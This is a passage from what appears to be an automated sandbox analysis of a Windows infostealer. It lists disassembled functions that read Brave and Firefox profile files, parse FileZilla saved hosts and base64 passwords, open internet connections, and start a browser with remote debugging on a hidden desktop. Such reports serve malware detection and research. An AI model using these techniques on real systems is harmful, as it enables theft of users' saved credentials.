                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 007BE0E7
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE11F
                              • lstrlen.KERNEL32(0145CF08), ref: 007BE12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE155
                              • lstrcat.KERNEL32(00000000,?), ref: 007BE15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE19F
                              • lstrcat.KERNEL32(00000000), ref: 007BE1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE1F9
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE22F
                              • lstrlen.KERNEL32(01458B08), ref: 007BE23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE261
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007BE269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007BE988
                              • FindClose.KERNEL32(00000000), ref: 007BE997
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: bd79fc814db0b0a22c0f5442525f4fdf845871a7510511efb15b1c80842c34da
                              • Instruction ID: 44bead404b6cf749fabc83db3a3d4c52dc43a6705769d60f38d330fe0596e20d
                              • Opcode Fuzzy Hash: bd79fc814db0b0a22c0f5442525f4fdf845871a7510511efb15b1c80842c34da
                              • Instruction Fuzzy Hash: 99523E71A15646DBDB21EF64DC89BEE77B9AF44300F044528F846AB352DB38EC46CB90
                              Function 007B60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B60FF
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6152
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6185
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B61B5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B61F0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B6233
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e2cc1ebde94f6b403c987facf1ed385e5341f3d54f8ee645630f84b06272317a
                              • Instruction ID: c2352dcfd247bbd9fe1ad16369edd137d5a765bce0868162dedf0987c117d334
                              • Opcode Fuzzy Hash: e2cc1ebde94f6b403c987facf1ed385e5341f3d54f8ee645630f84b06272317a
                              • Instruction Fuzzy Hash: 9652077191525A9BDB21EFA4DC89BEE77B9AF44300F158424F905BB252DB3CED02CB90
                              Function 007B4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B4C7F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4CD2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D05
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D35
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4D73
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B4DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B4DB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e9b8eac3c6da017613549664a9ca88ead9259d45c5ceea87f879af111276d187
                              • Instruction ID: 36f16041318b49db1b2173322b0ffe6d9829bf7f9821a0d8248579cae799cbfd
                              • Opcode Fuzzy Hash: e9b8eac3c6da017613549664a9ca88ead9259d45c5ceea87f879af111276d187
                              • Instruction Fuzzy Hash: D5525A31916256DBDB21EFA4DC89BEE77B9AF04300F154425F905BB252DB38ED42CBA0
                              Function 007C6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6B9D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BCD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BFD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 007C6C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007C6C43
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 007C6C5A
                              • lstrlen.KERNEL32(00000000), ref: 007C6C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 007C6CE2
                              • lstrlen.KERNEL32(00000000), ref: 007C6CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 007C6D6A
                              • lstrlen.KERNEL32(00000000), ref: 007C6D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6DB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007C6DF2
                              • lstrlen.KERNEL32(00000000), ref: 007C6E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007C6E94
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007C6EA8
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007C6EC9
                              • LocalFree.KERNEL32(00000000), ref: 007C6ED4
                              • lstrlen.KERNEL32(?), ref: 007C6F6E
                              • lstrlen.KERNEL32(?), ref: 007C6F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: 9e36c85ab681ee92aa0ed65d50935b538a1cbb826ac63bbb13a54072e57b944e
                              • Instruction ID: 25081bc5ba9c6be2902781711a6a1fc8fa6584f31adf3e04ad81290c1139d2ff
                              • Opcode Fuzzy Hash: 9e36c85ab681ee92aa0ed65d50935b538a1cbb826ac63bbb13a54072e57b944e
                              • Instruction Fuzzy Hash: 18027171A15256ABDB21EBB4DC8DF9E7BB9AF44700F144459F806EB242DB38DD02CB60
                              Function 007C4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4B7F
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BA7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C4BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 55f1d52769a8daf643d472af863efbbe57a1ee347af9f5fa640c912811555879
                              • Instruction ID: 8802d4f30efaad42a37400642d7438d72352aae921c3e2ed1cbe25e0bba3ab90
                              • Opcode Fuzzy Hash: 55f1d52769a8daf643d472af863efbbe57a1ee347af9f5fa640c912811555879
                              • Instruction Fuzzy Hash: 39923F70A15641CFDB24CF29D988F5AB7F5AF44714F1981ADE8099B362D73AEC82CB40
                              Function 007C1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C12BF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12E7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C133A
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C135C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1376
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C13E2
                              • lstrlen.KERNEL32(007E1794), ref: 007C13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C140A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1416
                              • lstrlen.KERNEL32(?), ref: 007C1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1443
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C147A
                              • StrCmpCA.SHLWAPI(?,0145CFE0), ref: 007C14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1535
                              • StrCmpCA.SHLWAPI(?,0145D0E0), ref: 007C1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C15E4
                              • StrCmpCA.SHLWAPI(?,0145CF98), ref: 007C1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1633
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1685
                              • StrCmpCA.SHLWAPI(?,0145CF50), ref: 007C16B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C16F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1745
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C181C
                              • FindClose.KERNEL32(00000000), ref: 007C182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 6d7446915f0829011edf0b408f2aae859289e54e75a4abd5842532ec72943ae1
                              • Instruction ID: 1d1c31a2d31ec1a31a2141de1fc94919b0277458b5211a2dc1d7b3ee0c424517
                              • Opcode Fuzzy Hash: 6d7446915f0829011edf0b408f2aae859289e54e75a4abd5842532ec72943ae1
                              • Instruction Fuzzy Hash: 05126E71A152469BDB25EF78D889FAE77B8AF45300F44453CF84AE7252DB38EC058B90
                              Function 007CCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007CCBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CCC13
                              • lstrcat.KERNEL32(?,?), ref: 007CCC5F
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CCC71
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CCC8B
                              • wsprintfA.USER32 ref: 007CCCB0
                              • PathMatchSpecA.SHLWAPI(?,01458B78), ref: 007CCCE2
                              • CoInitialize.OLE32(00000000), ref: 007CCCEE
                                • Part of subcall function 007CCAE0: CoCreateInstance.COMBASE(007DB110,00000000,00000001,007DB100,?), ref: 007CCB06
                                • Part of subcall function 007CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007CCB46
                                • Part of subcall function 007CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 007CCBC9
                              • CoUninitialize.COMBASE ref: 007CCD09
                              • lstrcat.KERNEL32(?,?), ref: 007CCD2E
                              • lstrlen.KERNEL32(?), ref: 007CCD3B
                              • StrCmpCA.SHLWAPI(?,007DCFEC), ref: 007CCD55
                              • wsprintfA.USER32 ref: 007CCD7D
                              • wsprintfA.USER32 ref: 007CCD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 007CCDB0
                              • wsprintfA.USER32 ref: 007CCDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CCDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 007CCE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 007CCE28
                              • CloseHandle.KERNEL32(00000000), ref: 007CCE33
                              • CloseHandle.KERNEL32(00000000), ref: 007CCE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007CCE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CCE94
                              • FindNextFileA.KERNEL32(?,?), ref: 007CCF8D
                              • FindClose.KERNEL32(?), ref: 007CCF9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: be3ada4fcabf77c918b3d994701c124b83513dd5251db1db47683e70c7f66324
                              • Instruction ID: d8126f93f2560ee888f60b6d00b5e67c5270ecb5afc8ef1183667993d62f3049
                              • Opcode Fuzzy Hash: be3ada4fcabf77c918b3d994701c124b83513dd5251db1db47683e70c7f66324
                              • Instruction Fuzzy Hash: 43C162729102599FDB61DFA4DC89FEE7779AF48300F04459CF90AA7281DA34AE85CF90
                              Function 007B9770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 007B9790
                              • lstrcat.KERNEL32(?,?), ref: 007B97A0
                              • lstrcat.KERNEL32(?,?), ref: 007B97B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007B97C3
                              • memset.MSVCRT ref: 007B97D7
                                • Part of subcall function 007D3E70: lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D3EA5
                                • Part of subcall function 007D3E70: lstrcpy.KERNEL32(00000000,0145A100), ref: 007D3ECF
                                • Part of subcall function 007D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,007B134E,?,0000001A), ref: 007D3ED9
                              • wsprintfA.USER32 ref: 007B9806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 007B9827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 007B9844
